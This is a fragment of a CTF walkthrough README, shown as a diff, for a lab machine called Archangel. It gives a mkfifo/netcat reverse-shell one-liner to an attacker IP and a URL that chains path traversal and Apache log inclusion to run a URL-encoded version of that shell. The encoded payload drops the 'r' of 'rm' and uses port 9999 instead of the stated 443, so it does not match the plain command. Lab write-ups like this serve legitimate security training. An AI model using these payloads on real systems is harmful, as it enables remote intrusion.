pg-cy/CTF-Walkthrough/Archangel/README.md

 - looks like everything works.
 Now for the reverse_shell.
 - this will be our payload for our RCE to execute.
 (Make sure to start a netcat listener on your own IP and PORT that you specified in the payload.
 Mine will be on port 443)
 - `rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.9.100.95 443 >/tmp/f`
-- Important to note, you might run into the issue where it takes you to google.
+- Important to note, you might run into the issue where the URL doesnt get processed properly and it might take you to google.
 You need to URL encode the payload, and specify the port the domain is on.
 - `http://mafialive.thm:80/test.php?view=/var/www/html/development_testing/..//..//..//..//..//var//log//apache2//access.log&cmd=m%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7C%2Fbin%2Fsh%20-i%202%3E%261%7Cnc%2010.9.100.95%209999%20%3E%2Ftmp%2Ff`

 ---------